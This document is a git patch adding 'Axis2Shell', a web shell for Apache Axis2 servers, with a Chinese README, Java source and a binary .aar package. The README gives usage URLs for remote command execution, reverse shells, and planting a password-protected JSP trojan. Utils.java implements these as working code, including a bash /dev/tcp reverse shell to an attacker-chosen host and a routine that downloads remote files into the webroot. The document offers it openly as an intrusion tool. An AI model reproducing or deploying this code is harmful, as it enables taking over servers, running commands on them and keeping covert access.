From 2a76726c7527bfad03ab9ceb761f269c47c54c28 Mon Sep 17 00:00:00 2001
From: tennc <tennc@126.com>
Date: Mon, 17 Nov 2014 09:36:07 +0800
Subject: [PATCH] add axis2web shell   @Svti

---
 other/Axis2Shell/README.md  |  54 +++++++++++++++
 other/Axis2Shell/Utils.java | 132 ++++++++++++++++++++++++++++++++++++
 other/Axis2Shell/config.aar | Bin 0 -> 6216 bytes
 3 files changed, 186 insertions(+)
 create mode 100644 other/Axis2Shell/README.md
 create mode 100644 other/Axis2Shell/Utils.java
 create mode 100644 other/Axis2Shell/config.aar

diff --git a/other/Axis2Shell/README.md b/other/Axis2Shell/README.md
new file mode 100644
index 0000000..bdd9333
--- /dev/null
+++ b/other/Axis2Shell/README.md
@@ -0,0 +1,54 @@
+axis2
+=========
+
+axis2 web shell  
+author : Svti  
+url : https://github.com/Svti/Axis2Shell  
+
+使用介绍：  
+
+1、命令执行  
+http://1.1.1.1/services/config/exec?cmd=whoami   
+(不说了，执行命令。注意:xml换行没有处理好)  
+
+2、反弹shell  
+http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555   
+(Linux则使用bash反弹shell，Windows则会进行socket执行shell)  
+
+
+3、文件上传  
+http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/shell.jsp  
+(会把resource目录下面的one.txt 写成shell.jsp，注意：全路径，带*文件名)  
+
+
+4、文件下载  
+http://1.1.1.1/services/config/download?url=http://www.ooo.com/mm.txt&path=/opt/tomcat/webapps/ROOT/shell.jsp  
+(会把这个URL的文件写成shell.jsp，注意：全路径，带*文件名)  
+
+
+5、class目录查看  
+http://1.1.1.1/services/config/getClassPath  
+(会显示当前class的路径，方便文件上传)  
+
+ps:  
+趁周末休息，看了几个国外的机器有 axis的 项目，特地去找了@园长的Cat.aar工具，发现真心不好使。  
+
+1、反弹shell 鸡肋，好多错误 ，ls / 都不行。   
+
+2、没有文件上传功能。这个对于一个渗透着来说很重要   
+
+于是自己写了个，希望大家喜欢。   
+
+源码已经上github https://github.com/Svti/Axis2Shell   
+
+
+aar 文件https://github.com/Svti/Axis2Shell/blob/master/config.aar也在github上面，还有什么问题，可以在下面评论   
+
+
+注意：   
+
+1、相同文件名的aar文件只能上传一次，虽说是remove Service了，服务器上面的还在。想要继续使用，请rename   
+
+2、默认的jsp一句话木马是/resource/one.txt，可以自己修改。默认密码是wooyun，发布版本里面放的是one.jsp，一向鄙视伸手党  
+3、Linux反弹shell 会在当前目录生成一个wooyun.sh的文件，当shell断开后会自动删除  
+
diff --git a/other/Axis2Shell/Utils.java b/other/Axis2Shell/Utils.java
new file mode 100644
index 0000000..f86cd26
--- /dev/null
+++ b/other/Axis2Shell/Utils.java
@@ -0,0 +1,132 @@
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.FileWriter;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.net.Socket;
+import java.net.URL;
+import java.net.URLConnection;
+
+public class Utils {
+	
+	static String os = System.getProperty("os.name").toLowerCase();
+
+	public static String exec(String cmd) {
+		String result="";
+		try {
+			if (cmd!=null&&cmd.trim().length()>0) {
+				if (os.startsWith("windows")) {
+					cmd="cmd.exe /c "+ cmd;
+				}else {
+					cmd="/bin/sh -c "+ cmd;
+				}
+				InputStream inputStream= Runtime.getRuntime().exec(cmd).getInputStream();
+				
+				int read=0;
+				while ((read=inputStream.read())!=-1) {
+					result+=(char)read;
+				}
+			}
+		} catch (Exception e) {
+			result=e.getMessage();
+		}
+		return result;
+	}
+	
+	public static String shell(String host, int port) {
+		
+		String result = "";
+		if (host != null && host.trim().length() > 0 && port > 0) {
+			try {
+				if (os.startsWith("linux")) {
+					
+					String name="wooyun.sh";
+					File file=new File(name);
+					
+					FileWriter writer=new FileWriter(file);
+					writer.write("/bin/bash -i > /dev/tcp/"+host+"/"+port+" 0<&1 2>&1"+"\n");
+					writer.flush();
+					writer.close();
+					Runtime.getRuntime().exec("chmod u+x "+name);
+					Process process = Runtime.getRuntime().exec("bash "+name);
+					process.waitFor();
+					
+					file.delete();
+				} else {
+					Socket socket = new Socket(host, port);
+					OutputStream out = socket.getOutputStream();
+					InputStream in = socket.getInputStream();
+					out.write(("whoami:\t" + exec("whoami")).getBytes());
+					int a = 0;
+					byte[] b = new byte[4096];
+					while ((a = in.read(b)) != -1) {
+						out.write(exec(new String(b, 0, a, "UTF-8").trim()).getBytes("UTF-8"));
+					}
+				}
+			} catch (Exception e) {
+				result = e.getMessage();
+			}
+
+		} else {
+			result = "host and port are required";
+		}
+		
+		return result;
+	}
+	
+	public static String upload(String path) {
+		String result="";
+		try {
+			if (path!=null&&path.trim().length()>0) {
+				FileOutputStream fos=new FileOutputStream(new File(path));
+				InputStream inputStream =new Utils().getClass().getResourceAsStream("/resource/one.txt");
+				BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
+				String temp = "";
+				while (reader.ready()) {
+					temp += reader.readLine() + "\n";
+				}
+				fos.write(temp.getBytes());
+				fos.flush();
+				fos.close();
+				result="Upload Success";
+			}else {
+				result="Path is required";
+			}
+		} catch (Exception e) {
+			result =e.getMessage();
+		}
+		return result;
+	}
+	
+	public static String download(String url, String path) {
+		String result="";
+		try {
+			
+			if (url!=null&&url.trim().length()>0&&path!=null&&path.trim().length()>0) {
+				URLConnection conn=new URL(url).openConnection();
+				conn.setReadTimeout(10*60*1000);
+				conn.setReadTimeout(10*60*1000);
+				InputStream inputStream=conn.getInputStream();
+				int read=0;
+				FileOutputStream fos=new FileOutputStream(new File(path));
+				while ((read=inputStream.read())!=-1) {
+					fos.write(read);
+				}
+				fos.flush();
+				fos.close();
+			}else {
+				result="Url and path are required";
+			}
+		} catch (Exception e) {
+			result =e.getMessage();
+		}
+		return result;
+	}
+
+	public static String getClassPath() {
+		return new Utils().getClass().getClassLoader().getResource("/").getPath();
+	}
+	
+}
diff --git a/other/Axis2Shell/config.aar b/other/Axis2Shell/config.aar
new file mode 100644
index 0000000000000000000000000000000000000000..4a07683b30038587907da991ed5e14b5c719004e
GIT binary patch
literal 6216
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

literal 0
HcmV?d00001